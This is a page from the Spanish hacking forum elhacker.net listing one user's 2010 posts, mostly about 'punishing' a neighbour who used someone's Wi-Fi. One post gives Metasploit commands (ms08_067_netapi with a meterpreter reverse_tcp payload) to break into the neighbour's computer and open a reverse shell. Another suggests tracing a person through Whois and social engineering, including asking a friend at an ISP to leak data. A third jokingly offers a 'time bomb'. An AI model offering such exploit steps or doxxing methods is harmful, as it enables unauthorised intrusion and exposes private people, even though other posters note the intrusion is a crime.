elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13
111  Foros Generales / Dudas Generales / Re: Se podra averiguar datos personales? en: 1 Julio 2010, 17:56 pm
Pues buscando en el Whois su ip seguramente te darán el proveedor y los números de teléfono de tal proveedor,  Ingeniería Social para el resto… yo por ejemplo en mi ciudad conozco a todos los proveedores no me es muy complicado llamar a un amigo a que me facilite información…  :xD suerte...
112  Foros Generales / Foro Libre / Re: ¿Será cierto...? en: 1 Julio 2010, 17:47 pm
Esos dispositivos rondan por mi país desde hace años no es nada nuevo… aparte de este hay otros más complejos, por lo menos aquí.
113  Foros Generales / Foro Libre / Re: ¿Quiero hackear a la Nasa que tengo que hacer? en: 29 Junio 2010, 18:52 pm
hackeo la nasa y monoto un servidor de IM?? vaya rumano..

Pues si el tío se lo pasa bien montando un servidor de IM en la nasa pues así es la vida no hay que criticar xD.
114  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 17:23 pm
De buen rollo el Chino se lo podia montar tal que así:



Si pero en vez de hacerlo así lo hizo por la fuerza bruta entrando y saliendo de donde le salía a el de los cojo… esperemos que tengamos suerte y lea este post xD.
115  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 16:50 pm
Dijiste que tenía el puerto 445 abierto pues abre la consola de el metasploit y prueba con el ms08_067_netapi

Te dejo los comandos:

Código:
use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x tu ip local

set RHOST 192.168.x.x ip local chino

exploit

Y si tienes suerte tendrás una Shell inversa. Suerte.
116  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 16:27 pm
Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.

Salu2.

Seguramente el chino ira y denunciara al chico por haberle accedido a la compu porque él se conecta a redes ajenas xD.
Hola me llamo Chino Amarillo y he venido a denunciar que me han jodido la compu por joder yo redes. :xD
117  Comunicaciones / Mensajería / Re: ayuda para recuperar cuenta hackeada en: 25 Junio 2010, 16:12 pm
hola me gustaria q me ayudaran a recuperar la cuenta hotmail de mi hermana

solo diganme los paso q debo seguir para recuperarle la cuenta

Yo te pasaría una bomba de tiempo para ayudarte pero no sé si los moderadores me lo permitirán xD mejor pídemelo por privado xD.
118  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 15:39 pm
Me llena de orgullo y satisfacción.... jajjaja.

Veo que has comprendido lo que intentaba decir.

El hecho de que los datas suban a esa velocidad no significa que alguien este pinchando, puede ser el mismo dueño descargando, o sabe dios que fotos estará viendo.  :silbar:


y ahora la vida según algunos.

Yo veo a alguien robando una tienda, y me digo, tengo que entrar, si tengo que entrar, y tapiar las puertas y ventanas, el dueño no volverá a entrara, pero los ladrones tampoco.

y el foro es para dar soporte para comprobar y mejorar tu red, hacerlo con una que no sea tuya es delito.

Si es que soy tonto, para que entrare al trapo. ah ya lo se, que me he tomado dos pastillas y era una sola jajajajajajja.



Salu2 y suerte

Repito no pidió soporte para entrar en otras redes. Y lee mi primer post dije algo por el estilo deja que se conecte a tu red para que estéis en local los dos. Así que cuidado con el diazepam.
119  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 15:15 pm
ok los router de vecinos ya estan bien sin su filitrado ni nada mas que les hice antes .y de verdad no era intencion de hacerlo , pero cuando con airdump ves que  #/s llegan hasta 700 y asi esta todo dia  ponte en lugar de esa gente que paga su cuota y no se entera que ay un intruso. y que no sea un familiar tuyo o quien sea


Nuestro amigo pazienzia, solo piensa en él y no se pone en el lugar de los otros. Me gustaría verlo en tu lugar no sé lo que haría el porqué según él no le tiene que dar nadie soporte.
120  Seguridad Informática / Hacking / Re: Castigar a un intruso en: 25 Junio 2010, 15:09 pm
Y cuando uno de esos pobres vecinos reciba la visita de alguien con su flamante  portátil, que??

Supongo habrá dejado un aviso en el que figure su numero de teléfono, para que le llamen y entrar otra vez al router para poner esa mac en la lista.

Yo es que alucino con vosotros.


Pero si da igual.

Alguien actuara, y sin dar explicaciones.

Salu2 y suerte.

Y es mejor que entren otros que no conoce a que no pueda entrar un amigo con su flamante portátil. Verdad? Además no  veo lo complicado de resetear el router. O si? pff seguramente el vecino necesitara clases de informática para resetear su router a default cuando vea que su amigo no se puede conectar.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines